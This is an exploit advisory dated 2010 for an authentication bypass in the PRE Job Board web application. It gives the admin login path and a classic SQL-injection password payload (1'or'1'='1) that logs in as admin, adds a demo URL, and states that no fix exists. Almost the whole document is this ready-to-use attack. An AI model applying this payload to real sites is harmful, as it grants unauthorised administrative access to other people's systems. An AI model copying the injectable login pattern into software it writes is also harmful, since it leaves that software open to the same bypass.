Pre Job Board Authentication Bypass Vulnerability

2010-11-14 09:16:22

In The Name Of GOD
[+] Exploit Title: PRE JOB BOARD SQL Bypass Vulnerability
[+] Date: 2010-11-14
[+] Author : Cru3l.b0y
[+] Software Link: http://www.preproject.com/jobs.asp
[+] Price : 22.00$
[+] Contact : [email protected]
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :

go to /siteadmin/index.php
Username : admin
Password : 1'or'1'='1

[+] Demo: http://www.site.com/jobdemo/siteadmin/index.php

Fixes

No fixes

In order to submit a new fix you need to be registered.